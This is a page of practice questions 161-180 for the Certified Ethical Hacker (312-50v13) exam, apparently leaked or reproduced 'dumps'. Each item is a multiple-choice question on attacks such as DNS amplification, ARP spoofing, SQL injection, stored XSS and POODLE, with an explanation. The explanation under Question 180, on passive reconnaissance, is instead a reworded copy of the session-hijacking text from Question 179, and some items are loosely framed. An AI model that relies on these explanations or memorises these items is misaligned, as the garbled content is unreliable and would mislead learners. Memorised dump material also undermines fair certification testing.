ECCouncil 312-50v13 Certified Ethical Hacker v13 Exam Dumps and Practice Test Questions Set 9 Q161-180

Visit here for our full ECCouncil 312-50v13 exam dumps and practice test questions.

Question 161 

An attacker sends thousands of DNS requests using spoofed IP addresses to overload a DNS server. What type of attack is this?

A) DNS amplification attack
B) DNS poisoning
C) DNS tunneling
D) DNS cache snooping

Answer:  A) DNS amplification attack

Explanation: 

DNS poisoning involves manipulating DNS entries so that victims receive incorrect IP address information. It focuses on corrupting DNS records rather than overwhelming a DNS server with traffic. Because poisoning focuses on altering stored values rather than generating large volumes of requests, it is not the attack described.

DNS tunneling allows attackers to encode data inside DNS queries and responses to bypass firewalls or exfiltrate information. It is a covert communication method and not intended to overload the server with traffic. Tunneling is about data transfer and evasion, not about volumetric flooding.

DNS cache snooping is a technique attackers use to query DNS servers indirectly to infer which domains users on that server have recently looked up. It does not involve high traffic volume or spoofing requests. It is a reconnaissance technique and not an attack that overwhelms servers.

A DNS amplification attack uses DNS resolvers to generate extremely large responses to small input queries. Attackers spoof the victim’s IP address, causing DNS servers to respond with large replies directed at the victim or at the targeted DNS infrastructure. The attack scales massively because small queries trigger large responses, amplifying traffic. The question describes an attacker using spoofed IP addresses to overload DNS servers, which aligns perfectly with the concept of DNS amplification. For this reason, DNS amplification attack is the correct answer.

Question 162 

Which type of malware encrypts files on a victim’s system and demands payment for decryption?

A) Rootkit
B) Ransomware
C) Logic bomb
D) Spyware

Answer: B) Ransomware

Explanation: 

A rootkit hides malicious activity by embedding itself deep inside the operating system. Its purpose is to remain undetected, conceal backdoors, or hide processes. Rootkits do not encrypt user files or demand payment. They are stealthy persistence mechanisms rather than extortion tools.

Ransomware encrypts files or entire systems and refuses to restore access unless a ransom is paid. It typically uses strong cryptographic algorithms and displays a payment notification demanding money, often in cryptocurrency. Because the question specifically describes malware that encrypts files and demands payment, ransomware is the correct answer.

A logic bomb executes a malicious payload when triggered by specific conditions, such as a date or system event. It does not inherently encrypt files or request payment. It is based on logic and timing, not extortion.

Spyware monitors user activities, collects sensitive data, or tracks browsing behavior. It silently gathers information rather than encrypting files or extorting victims. Its purpose is surveillance, not ransom.

The only malware type designed to encrypt data and demand payment is ransomware.

Question 163

Which wireless attack forces clients to reconnect so the attacker can capture the WPA/WPA2 four-way handshake?

A) Deauthentication attack
B) Evil twin attack
C) KRACK attack
D) Wardriving

Answer:  A) Deauthentication attack

Explanation: 

An evil twin attack creates a rogue access point that mimics a legitimate one. While this can lead to credential theft or man-in-the-middle attacks, it does not inherently force clients to reconnect by disconnecting them. Its purpose is impersonation, not forced reconnection for handshake collection.

A KRACK attack exploits weaknesses in WPA2’s four-way handshake by manipulating key reinstallation messages. This attack requires proximity and interactive manipulation of handshake messages but does not rely on forcing reconnections via deauthentication frames. It exploits protocol-level flaws rather than reconnection forcing.

Wardriving is simply scanning for wireless networks while moving through an area using equipment mounted on a vehicle. It is a reconnaissance technique and does not involve forcing client reconnections.

A deauthentication attack sends forged deauth frames to wireless clients, forcing them to disconnect from the access point. When they reconnect automatically, attackers capture the WPA/WPA2 four-way handshake. This handshake can then be used for offline password cracking. Because the attack described in the question matches this behavior exactly, deauthentication attack is the correct answer.

Question 164 

What type of assessment simulates an attacker with full internal knowledge of the environment, including network diagrams and credentials?

A) Gray-box assessment
B) Black-box assessment
C) White-box assessment
D) Red teaming

Answer: C) White-box assessment

Explanation:

A gray-box assessment gives testers partial knowledge such as limited credentials or selective diagrams. It simulates a user with some internal access but not full visibility. It is not equivalent to having complete details about the environment.

A black-box assessment provides no prior knowledge. Testers perform reconnaissance as an external attacker would, gathering information from scratch. This is the opposite of the scenario described, which gives full internal knowledge.

A white-box assessment gives complete visibility into the environment, including source code, diagrams, architecture details, and often valid credentials. It allows comprehensive testing of internal components and identifies deep-level vulnerabilities. Because the question describes full internal knowledge, white-box is the correct answer.

Red teaming is an adversarial simulation mimicking malicious attacker behavior. It focuses on goals, stealth, persistence, and realistic intrusion attempts, not necessarily full knowledge. Red teams may operate with black-box or gray-box assumptions depending on the engagement. They do not automatically receive full internal data.

Thus white-box assessment matches the description exactly.

Question 165 

Which attack manipulates ARP messages to associate the attacker’s MAC address with another device’s IP address?

A) ARP spoofing
B) DNS spoofing
C) ICMP redirect attack
D) DHCP spoofing

Answer:  A) ARP spoofing

Explanation: 

DNS spoofing involves falsifying DNS responses to redirect victims to fraudulent IP addresses. It occurs at the domain name resolution level and has nothing to do with MAC-to-IP associations.

An ICMP redirect attack uses specially crafted ICMP messages to instruct a device to send traffic through a different router. Although it alters routing behavior, it does not manipulate ARP tables or change MAC associations.

DHCP spoofing involves setting up a rogue DHCP server that distributes incorrect configuration settings such as gateways or IPs. It does not rely on altering ARP entries; instead, it deceives clients during the DHCP negotiation.

ARP spoofing manipulates ARP replies to poison a target’s ARP cache so that an attacker’s MAC address becomes associated with the IP address of another device, such as a gateway. This enables man-in-the-middle attacks, packet interception, or traffic redirection. The description in the question matches ARP spoofing exactly, making it the correct answer.

Question 166 

Which method attempts to guess a cryptographic key by trying all possible key combinations?

A) Rainbow table attack
B) Side-channel attack
C) Brute force attack
D) Birthday attack

Answer: C) Brute force attack

Explanation: 

A brute force attack is a fundamental cryptographic attack technique in which an attacker attempts to guess the correct key or password by systematically testing every possible combination within the key space. This method is exhaustive and guarantees eventual success if the key or password is within the attackable range and computational resources are sufficient. Brute force attacks do not rely on shortcuts, precomputed tables, predictions, or user behavior—they simply attempt every combination until the correct one is found. This makes brute force attacks extremely reliable, though often computationally expensive and time-consuming, especially when key lengths are long or character sets are complex.

A rainbow table attack, by contrast, is a precomputed lookup method used to reverse cryptographic hashes, such as password hashes. Rainbow tables store hashes of commonly used passwords or password combinations to allow rapid retrieval of plaintext from a hash. While this technique speeds up the attack process, it does not attempt all possible keys or combinations; it relies entirely on precomputed results. Consequently, rainbow table attacks are limited to the contents of the table and cannot guarantee coverage of all possible keys.

Side-channel attacks exploit physical characteristics of devices performing cryptographic operations, such as timing information, power consumption, electromagnetic emissions, or even acoustic signals. By analyzing these characteristics, attackers can infer information about cryptographic keys. Side-channel attacks are indirect and observational; they do not involve systematically trying every possible key, making them fundamentally different from brute force attacks.

Birthday attacks exploit mathematical properties of hash functions, particularly the probability of collisions in hash outputs. Instead of attempting every key combination, a birthday attack focuses on generating two distinct inputs that produce the same hash value. This approach is based on probability theory rather than exhaustive enumeration and is effective primarily against hash functions, not key spaces.

Because the question explicitly describes attempting all possible key combinations, the brute force attack fits this definition precisely. It is defined by its exhaustive nature and methodical coverage of the entire key space, making it distinct from rainbow tables, side-channel attacks, or birthday attacks.

Question 167 

Which type of SQL injection attack uses semicolons to append additional queries after a legitimate query?

A) Tautology injection
B) Union-based injection
C) Piggy-backed injection
D) Blind injection

Answer: C) Piggy-backed injection

Explanation: 

Piggy-backed SQL injection is an advanced SQL injection technique in which attackers append additional malicious queries to a legitimate SQL statement, typically separated by a semicolon or another statement delimiter. The primary query executes normally, while the injected queries execute immediately afterward. This allows attackers to perform multiple operations in a single request, such as creating new users, deleting records, or extracting sensitive data from other tables. Piggy-backed injection is particularly dangerous because it allows arbitrary command execution on the database and can bypass authentication or authorization checks by piggy-backing on legitimate statements.

Tautology-based injection, in contrast, manipulates conditional logic in SQL statements so that expressions always evaluate to true. It is commonly used to bypass authentication mechanisms, such as altering a login query to grant access without valid credentials, but it does not involve executing multiple queries sequentially.

Union-based injection uses the SQL UNION operator to combine the results of the original query with attacker-controlled queries. This technique is primarily used to extract data from additional tables or columns but does not append separate queries for execution after the original statement.

Blind SQL injection occurs when the database suppresses error messages or output, making it impossible to directly view query results. Attackers infer information by observing changes in behavior, response time, or content, rather than by directly executing multiple appended queries.

Since the question specifies using semicolons to append additional queries, piggy-backed injection is the exact match. It allows attackers to execute additional SQL commands sequentially after the original query, which is precisely what differentiates it from tautology, union-based, or blind injection attacks.

Question 168 

Which type of password attack uses rules to modify dictionary words to generate variations?

A) Dictionary attack
B) Hybrid attack
C) Brute force attack
D) Credential stuffing

Answer: B) Hybrid attack

Explanation:

A hybrid password attack is a technique that combines dictionary-based wordlists with systematic rules to generate variations of base words. Attackers begin with a dictionary of common passwords, phrases, or known credentials and then apply transformations to increase coverage. These transformations may include appending numbers, substituting characters with symbols (for example, replacing “a” with “@”), capitalizing letters, reversing words, or inserting special characters. The purpose is to simulate real-world password habits, such as users slightly modifying a common word to meet complexity requirements. Hybrid attacks strike a balance between efficiency and effectiveness, as they are more targeted than brute force attacks while more comprehensive than simple dictionary attacks.

In contrast, a dictionary attack relies solely on a static wordlist without any modifications. The attacker tests each entry in the list as-is, making the approach limited to the dictionary contents. While dictionary attacks are fast and often effective against weak passwords, they do not create new password variations through rules or transformations.

Brute force attacks attempt every possible combination of characters within a defined key or password space. They do not rely on dictionary words or rule-based modifications, making them exhaustive but computationally intensive. Credential stuffing uses previously leaked usernames and passwords to attempt unauthorized logins across multiple sites. It does not generate variations of dictionary words and instead relies entirely on valid credentials obtained from prior breaches.

Because the question explicitly asks for an attack method that modifies dictionary words using rules to generate variations, the hybrid attack is the correct choice. It uniquely combines dictionary wordlists with algorithmic transformations to maximize the chance of guessing passwords while remaining efficient.

Question 169 

Which tool is commonly used to perform SMB enumeration on Windows networks?

A) Aircrack-ng
B) Enum4linux
C) Nmap Harbour
D) Hydra

Answer: B) Enum4linux

Explanation: 

Enum4linux is a widely used open-source tool designed specifically for enumerating Windows and Samba systems via the SMB (Server Message Block) protocol. It retrieves detailed information about users, groups, shared folders, and security policies without exploiting vulnerabilities. This makes it a fundamental tool in penetration testing and ethical hacking when assessing Windows networks. Enum4linux works by querying SMB and NetBIOS services and can reveal critical information such as usernames, group memberships, password policy settings, and accessible shares, which attackers or testers can later leverage for password attacks, privilege escalation, or network mapping.

Aircrack-ng is a suite of wireless security tools used primarily for auditing Wi-Fi networks. It focuses on monitoring, cracking WEP and WPA/WPA2 keys, and packet analysis. It does not provide SMB enumeration capabilities or interact with Windows shares.

Nmap is a versatile network scanning tool capable of performing SMB enumeration through scripts (NSE), but “Nmap Harbour” is not a standard or recognized component, making it an incorrect option in this context. Nmap itself can enumerate SMB hosts but is not specifically tailored for detailed Windows SMB enumeration like Enum4linux.

Hydra is a brute force login tool used to test passwords across numerous protocols, including SMB, FTP, SSH, HTTP, and more. While it can attempt authentication against SMB services, it does not enumerate users, groups, or shared resources.

Since the question specifically asks for a tool designed for SMB enumeration on Windows networks, Enum4linux is the correct and precise choice. Its capabilities are uniquely suited to gather SMB-related information comprehensively, efficiently, and reliably.

Question 170 

Which type of attack involves an attacker capturing encrypted traffic and analyzing it later to attempt decryption?

A) Man-in-the-middle attack
B) Replay attack
C) Passive attack
D) Keylogging attack

Answer: C) Passive attack

Explanation: 

A passive attack is a method in which an adversary monitors or eavesdrops on network communications without actively interfering with or altering the data. The attacker captures network traffic—potentially including encrypted communications—with the goal of analyzing it offline for intelligence or cryptographic weaknesses. Passive attacks preserve the integrity of the original communication, making them stealthy and difficult to detect, which contrasts sharply with active attacks that inject, modify, or disrupt traffic.

Man-in-the-middle (MITM) attacks intercept and modify traffic in real-time between two endpoints. Although MITM attacks involve capturing data, they are active because the attacker manipulates communications, alters content, or injects malicious messages. This makes MITM attacks distinct from passive attacks that solely observe and collect information.

Replay attacks involve capturing data packets and resending them to produce repeated actions, such as unauthorized transactions or repeated authentication attempts. While they do capture traffic, their focus is on resending or repeating actions, not on offline cryptanalysis or decryption attempts.

Keylogging attacks focus on recording user keystrokes to obtain sensitive information, such as passwords or personal data. Keylogging does not involve capturing encrypted network traffic or attempting decryption.

In passive attacks, the collected encrypted traffic can be stored and later analyzed using various cryptanalytic techniques. Attackers might attempt to decrypt messages offline, exploit weak encryption algorithms, or search for patterns in encrypted data. Since the question explicitly refers to capturing encrypted traffic and analyzing it later for decryption, passive attack precisely matches this description. Passive attacks are fundamental in both network security assessments and advanced cyberattack scenarios due to their stealth and potential to reveal critical information without alerting the target.

Question 171 

Which type of XSS attack stores malicious scripts in a web application’s database for later execution?

A) Reflected XSS
B) Stored XSS
C) DOM-based XSS
D) Self-XSS

Answer: B) Stored XSS

Explanation: 

Stored cross-site scripting (XSS) is a severe web vulnerability in which an attacker injects malicious scripts into a web application that persist in the server-side storage, such as databases, message boards, comment sections, or logs. Once stored, these scripts are served to users who access the affected pages, causing the script to execute automatically in their browsers. Stored XSS is particularly dangerous because it can impact multiple users over time without requiring them to click on malicious links or perform any special action, unlike reflected XSS, which is transient and only executes immediately after a user submits crafted input via URLs or form fields.

Reflected XSS occurs when user input is immediately returned in a server’s response, causing temporary script execution. It does not persist in the database or application storage, making it unsuitable for attacks that target multiple users over time. DOM-based XSS, in contrast, executes entirely on the client side by manipulating the Document Object Model of a webpage. The payload runs when the client’s browser interprets the modified DOM, but no server-side storage is involved. Self-XSS relies on social engineering, tricking users into pasting malicious scripts into their own browsers. It requires direct user interaction, unlike stored XSS, which automatically propagates to anyone accessing the infected content.

Because the question explicitly mentions scripts stored in a database for later execution, stored XSS perfectly fits the scenario. The key characteristic is persistence in server-side storage and automatic execution in end users’ browsers, enabling wide-reaching impact. Attackers can use stored XSS to steal session tokens, perform privilege escalation, redirect users, or deliver other malware, making it one of the most critical XSS types in web application security.

Question 172 

Which tool is commonly used to crack wireless WPA/WPA2 PSK passwords?

A) Aircrack-ng
B) Nikto
C) Burp Suite
D) Metasploit

Answer:  A) Aircrack-ng

Explanation: 

Aircrack-ng is a comprehensive suite of tools for auditing wireless networks. It is primarily used to test the security of Wi-Fi networks using WEP, WPA, and WPA2 encryption protocols. The tool can capture WPA/WPA2 handshake packets when a client authenticates with the access point. Once the handshake is captured, Aircrack-ng performs offline dictionary or brute-force attacks against the handshake to recover the pre-shared key (PSK). This makes it one of the most widely used tools in Wi-Fi security assessments and penetration testing.

Nikto is a web server vulnerability scanner that identifies outdated software, misconfigurations, and common vulnerabilities in HTTP services. It does not interact with wireless protocols or capture Wi-Fi handshakes, making it irrelevant for WPA/WPA2 cracking. Burp Suite is a web application testing platform designed for intercepting, modifying, and analyzing HTTP requests to identify vulnerabilities. While it excels at web security testing, it cannot perform wireless password cracking. Metasploit is an exploitation framework that automates attacks against various system vulnerabilities, but it does not specialize in recovering wireless PSKs.

Since the question specifically asks for a tool designed to crack WPA/WPA2 pre-shared keys, Aircrack-ng is the correct answer. Its ability to capture authentication handshakes and perform offline password recovery through dictionaries or brute-force methods makes it essential for auditing Wi-Fi network security.

Question 173 

Which type of attack attempts to overwhelm a system with ICMP echo requests?

A) Ping flood
B) SYN flood
C) Smurf attack
D) Teardrop attack

Answer:  A) Ping flood

Explanation:

A ping flood is a type of Denial-of-Service (DoS) attack that targets network bandwidth and system resources by sending a large volume of ICMP echo request packets (ping requests) to a target. The target system attempts to respond to each request, consuming processing power and network capacity, potentially slowing down or crashing the system. Ping flood attacks are simple but effective, particularly against systems with limited bandwidth.

SYN flood attacks exploit the TCP three-way handshake by sending excessive SYN packets to target ports, consuming memory and resources for half-open connections. This attack does not involve ICMP echo requests. Smurf attacks are a form of amplified ICMP flooding that use broadcast addresses to generate large amounts of responses toward a victim. While related to ICMP, Smurf attacks rely on amplification and spoofing, unlike a direct ping flood. Teardrop attacks exploit TCP/IP fragmentation issues by sending overlapping fragmented packets that crash older operating systems. They do not involve ICMP echo requests.

Because the question specifically mentions overwhelming a system with ICMP echo requests, ping flood is the correct answer. It directly matches the described method and effect, distinguishing it from SYN flood, Smurf, or Teardrop attacks.

Question 174 

Which type of malware is designed to remain undetected by hiding system processes and files?

A) Worm
B) Rootkit
C) Trojan
D) Adware

Answer: B) Rootkit

Explanation:

A rootkit is a type of malware designed specifically for stealth and persistence. It embeds itself deeply into the operating system, often at the kernel level, to hide processes, files, registry entries, and network activity. Rootkits allow attackers to maintain covert access to a system without triggering security alerts or detection mechanisms. They can facilitate data exfiltration, remote control, or deployment of additional malware while remaining invisible to antivirus or system monitoring tools.

Worms are self-replicating malware that propagate across networks. Their primary goal is rapid spread, not stealth, so they do not inherently hide processes or files. Trojans disguise themselves as legitimate software and may deliver malicious payloads, but they do not inherently manipulate system functions to remain undetected like rootkits. Adware generates advertisements and revenue for its creators. It typically does not hide itself or alter core system operations, making it unrelated to stealth-focused malware.

The question specifies malware that hides system processes and files to remain undetected, which precisely describes a rootkit. Its ability to operate covertly over extended periods makes it one of the most dangerous types of malware for persistent system compromise.

Question 175 

Which vulnerability allows attackers to inject malicious SQL statements into an application?

A) Cross-site scripting
B) SQL injection
C) Command injection
D) LDAP injection

Answer: B) SQL injection

Explanation: 

SQL injection (SQLi) is one of the most significant and widely exploited vulnerabilities in web applications, primarily because it targets the heart of an application’s data storage system—its backend database. SQL injection occurs when attackers insert or “inject” malicious SQL statements into input fields, form parameters, cookies, HTTP headers, or URL query strings. When the application fails to properly validate or sanitize this input, the malicious SQL is executed by the database engine. This can lead to severe consequences, including unauthorized data retrieval, modification, deletion, or even complete compromise of the entire database server. SQLi exploits weak coding practices such as dynamic query construction, lack of prepared statements, and insufficient input validation. Because SQL injection directly manipulates the server-side SQL queries, it enables attackers to bypass authentication, extract sensitive information such as usernames and passwords, tamper with existing data, or escalate privileges inside the system.

SQL injection differs fundamentally from other injection‑style attacks, each of which targets different components of the system. For example, cross-site scripting (XSS) affects users rather than servers. In an XSS attack, the attacker injects malicious scripts—typically JavaScript—that execute in the victim’s browser. This can lead to session theft, credential capture, or unauthorized actions performed on behalf of the user. However, XSS does not directly interact with the SQL database or alter backend SQL queries.

Command injection is another distinct attack type, but instead of targeting SQL queries, it exploits vulnerabilities that allow execution of operating system commands. Through command injection, attackers might run system-level commands such as reading files, creating new processes, or opening network connections. It compromises the underlying OS rather than the database layer.

Similarly, LDAP injection affects directory services, such as those used for authentication or organizational data retrieval. LDAP queries are structured differently from SQL queries, and an LDAP injection manipulates these directory queries rather than interacting with relational databases.

Because the question clearly specifies the injection of SQL statements, SQL injection is unequivocally the correct answer. It is the only attack type among the options that directly compromises the database layer by manipulating SQL-based commands. SQLi remains one of the most dangerous vulnerabilities due to its potential impact, often granting attackers full control over stored data. Proper safeguards such as input validation, prepared statements, parameterized queries, and least‑privilege database accounts are essential defenses to mitigate SQL injection risks in modern web applications.

Question 176 

Which attack allows an attacker to intercept, modify, or inject traffic between two communicating systems?

A) Man-in-the-middle
B) Replay attack
C) DNS spoofing
D) Smurf attack

Answer:  A) Man-in-the-middle

Explanation:

A man-in-the-middle (MITM) attack is a sophisticated method where an attacker secretly intercepts communication between two parties. Unlike attacks that simply capture data, MITM allows the attacker to read, modify, or inject messages in real time. This capability makes it particularly dangerous, as the victim often remains unaware that the communication is being tampered with. MITM can be executed over unsecured Wi-Fi networks, compromised routers, or by exploiting vulnerabilities in encryption protocols.

Replay attacks, by contrast, operate differently. They capture valid data transmissions and retransmit them later to achieve unauthorized effects, such as reusing login credentials. Replay attacks do not intercept ongoing traffic in real time nor allow message modification, which is a key distinction from MITM. Therefore, they do not fit the scenario described in the question.

DNS spoofing is another type of attack that can redirect traffic by providing false IP addresses for requested domain names. While DNS spoofing can mislead users into visiting malicious sites, it does not grant the attacker the ability to intercept and manipulate communication between legitimate systems. It primarily changes the destination rather than altering messages in transit.

Smurf attacks, meanwhile, are ICMP-based denial-of-service attacks that flood a network by amplifying traffic. They are not designed for intercepting or modifying communication and therefore are unrelated to the scenario of ongoing traffic manipulation. Considering these distinctions, man-in-the-middle is the most precise answer, as it directly allows interception, modification, and injection of messages between two communicating systems, which exactly matches the question description.

Question 177 

Which scanning technique attempts to discover live hosts without sending full TCP connections?

A) TCP connect scan
B) SYN scan
C) UDP scan
D) ACK scan

Answer: B) SYN scan

Explanation:

A SYN scan, often referred to as a “half-open scan,” is a widely used network reconnaissance technique that allows attackers to detect live hosts and identify open ports while minimizing the likelihood of detection. The method operates by sending a SYN packet to the target port, initiating the first step of the standard TCP three-way handshake. If the target port is open, the system responds with a SYN-ACK packet, indicating that it is ready to establish a connection. At this point, rather than completing the handshake with a final ACK, the scanner deliberately refrains from sending it, leaving the connection in a half-open state. This behavior allows the scanner to infer that the port is active without establishing a full TCP session, which significantly reduces the chance that the scan will be logged or detected by intrusion detection systems, firewalls, or other security monitoring tools.

The SYN scan is particularly valued for its stealth characteristics and efficiency. Because it avoids completing connections, it generates minimal traffic and leaves fewer traces in server logs, making it a preferred choice for attackers conducting reconnaissance prior to more intrusive operations. By systematically sending SYN packets to multiple ports and analyzing responses, the attacker can quickly map out which services are running on a target system and plan subsequent exploitation attempts.

In contrast, a TCP connect scan completes the full three-way handshake by sending SYN, receiving SYN-ACK, and then replying with the final ACK. While this approach reliably identifies open ports, it is far more detectable because it results in complete connections that are logged by the target system. Therefore, TCP connect scans do not satisfy the specific requirement of avoiding full connections as described in this scenario.

Other scanning techniques operate differently and serve different objectives. UDP scans focus on the availability of UDP ports, which do not rely on the TCP handshake and therefore function through an entirely different protocol mechanism. ACK scans, on the other hand, are primarily employed to map firewall rules and determine whether ports are filtered or unfiltered. They are not used to identify open ports directly or detect live hosts in the same way that SYN scans do.

Given these distinctions, the SYN scan is the most accurate answer to the scenario described. Its ability to identify live systems and open ports while avoiding the establishment of full TCP connections aligns perfectly with the requirements of stealthy network reconnaissance. This makes it a powerful and commonly utilized tool for attackers who aim to gather critical information with minimal visibility and risk during the initial stages of a network attack.

Question 178

Which attack exploits weaknesses in SSL/TLS by forcing downgrades to weaker encryption?

A) POODLE
B) Heartbleed
C) CRIME
D) BEAST

Answer:  A) POODLE

Explanation: 

The POODLE attack, which stands for Padding Oracle On Downgraded Legacy Encryption, is a well-known vulnerability targeting SSL/TLS protocols, specifically exploiting weaknesses in the SSL 3.0 standard. The attack takes advantage of the SSL 3.0 fallback mechanism, a feature designed to ensure backward compatibility with older servers or clients that do not support modern versions of TLS. When a client attempts to establish a secure connection with a server, an attacker can actively interfere with the handshake process, forcing a protocol downgrade from a stronger TLS version, such as TLS 1.2 or 1.3, to SSL 3.0. SSL 3.0, however, has significant cryptographic flaws, particularly in its padding structure used in block cipher modes. By exploiting these padding weaknesses, an attacker can decrypt parts of the encrypted communication, such as cookies or authentication tokens, potentially gaining access to highly sensitive information without needing to compromise the underlying cryptographic key directly.

It is crucial to differentiate POODLE from other SSL/TLS vulnerabilities, as each targets distinct weaknesses. For example, Heartbleed exploits a buffer over-read in certain OpenSSL implementations. By sending specially crafted heartbeat requests, an attacker can retrieve portions of server memory, which might include private keys, passwords, or other sensitive data. While extremely serious, Heartbleed does not rely on downgrading the protocol or manipulating SSL versions. Similarly, the CRIME attack focuses on SSL/TLS compression. By exploiting the compression of plaintext before encryption, attackers can infer secrets like session cookies through careful observation of compressed ciphertext lengths. CRIME’s mechanism is unrelated to protocol downgrades and does not exploit SSL 3.0 padding.

The BEAST attack, another notable SSL/TLS vulnerability, targets weaknesses in the way TLS 1.0 implements block cipher initialization vectors (IVs). Attackers can decrypt traffic under specific conditions by taking advantage of predictable IVs and known plaintext. Despite its impact on encrypted traffic confidentiality, BEAST does not involve forcing clients or servers to use weaker SSL versions and therefore does not align with scenarios emphasizing protocol downgrades.

Because the scenario specifically mentions forcing a downgrade to weaker encryption, POODLE is the most accurate and relevant answer. By exploiting SSL 3.0 fallback behavior, the attack enables an adversary to bypass stronger TLS protections, highlighting the risks associated with supporting outdated cryptographic protocols. This makes it a unique threat compared to Heartbleed, CRIME, or BEAST, and emphasizes the importance of disabling SSL 3.0 and enforcing the use of modern, secure TLS versions to protect communications against downgrade-based attacks.

Question 179 

Which attack captures authentication tokens or session cookies to impersonate a legitimate user?

A) Phishing
B) Session hijacking
C) Keylogging
D) SQL injection

Answer: B) Session hijacking

Explanation:

Session hijacking is a type of cyberattack in which an attacker takes control of an active session between a user and a web application or network service. In this scenario, a session is the period during which a user is authenticated and interacting with a system, usually maintained through session tokens, session IDs, or cookies. These tokens act as temporary credentials, proving the user’s identity and granting access to resources without repeatedly requesting the username and password. When an attacker successfully intercepts these session tokens, they can impersonate the legitimate user, gaining unauthorized access to accounts, applications, and sensitive data without ever needing the actual password. This capability makes session hijacking particularly dangerous because it bypasses conventional authentication measures and allows attackers to operate with the privileges of the compromised user, often unnoticed.

Session hijacking can occur through multiple methods. One common technique is a man-in-the-middle (MITM) attack, where the attacker intercepts communication between the user and the server, capturing session cookies or tokens as they are transmitted over the network. Another method involves cross-site scripting (XSS) attacks, where malicious scripts embedded on a web page can read cookies stored in the browser and transmit them to an attacker. Network sniffing tools can also be used on unsecured networks to capture session identifiers in transit. Once obtained, these tokens allow attackers to bypass login procedures, making it a highly effective method for unauthorized access.

It is important to distinguish session hijacking from other attack vectors. Phishing attacks, for example, rely on tricking users into voluntarily divulging credentials, often through fake websites or deceptive emails. While phishing can lead to account compromise, it does not directly capture or reuse active session tokens. Similarly, keylogging records keystrokes to capture passwords but does not provide access to live sessions or session identifiers. SQL injection is a database-focused attack that manipulates backend queries to retrieve or modify data. While it may expose stored authentication information, it does not inherently capture real-time session tokens, so it cannot directly impersonate a user in an ongoing session.

Therefore, among these options, session hijacking is the most accurate and relevant answer. By targeting session tokens or cookies, it allows attackers to impersonate legitimate users effectively, aligning precisely with the scenario described. This attack emphasizes the critical importance of securing session management mechanisms, using encryption, and implementing measures like token expiration and multi-factor authentication to mitigate risks associated with session hijacking.

Question 180 

Which reconnaissance technique collects information from publicly available sources without interacting with the target?

A) Active reconnaissance
B) Passive reconnaissance
C) Social engineering
D) Credential harvesting

Answer: B) Passive reconnaissance

Explanation:

Session hijacking is a sophisticated type of cyberattack in which an attacker takes control of an active session between a user and a web application or network service. In this context, a session represents the duration during which a user is authenticated and interacting with a system, often maintained through mechanisms such as session tokens, session IDs, or cookies. These elements function as temporary credentials that validate the user’s identity and grant access to resources without repeatedly prompting for login information. When an attacker successfully intercepts these session tokens, they gain the ability to impersonate the legitimate user, allowing unauthorized access to accounts, applications, or sensitive data without ever needing the user’s actual password. This characteristic makes session hijacking particularly dangerous, as it bypasses conventional authentication safeguards and enables attackers to operate with the same privileges as the compromised user, frequently without detection.

Session hijacking can be executed through several techniques. A common method is the man-in-the-middle (MITM) attack, wherein the attacker intercepts communication between the user and the server, capturing session cookies or tokens as they travel across the network. Another prevalent technique involves cross-site scripting (XSS) attacks, where malicious scripts injected into vulnerable web pages can access cookies stored in the user’s browser and relay them to the attacker. Additionally, network sniffing on unsecured networks can reveal session identifiers in transit. Once these tokens are obtained, the attacker can bypass normal authentication procedures, making session hijacking an efficient and potent method for unauthorized access.

It is essential to differentiate session hijacking from other attack types. Phishing attacks manipulate users into voluntarily providing credentials via fake websites, emails, or other deceptive means; they do not directly capture active session tokens. Keylogging records keystrokes to steal passwords but does not grant access to live sessions or session identifiers. SQL injection, a database-centric attack, manipulates backend queries to access or modify stored information, including passwords in some cases, but it does not directly intercept live session tokens. Consequently, these attacks, while potentially leading to account compromise, do not replicate the immediate session control achieved by hijacking.

Thus, session hijacking is the most precise and relevant answer for scenarios involving the capture of authentication tokens. By targeting session cookies or identifiers, attackers can effectively impersonate legitimate users. This underscores the importance of implementing robust session management practices, including encryption of session data, token expiration policies, secure cookie flags, and multi-factor authentication, all of which help mitigate the risks associated with session hijacking.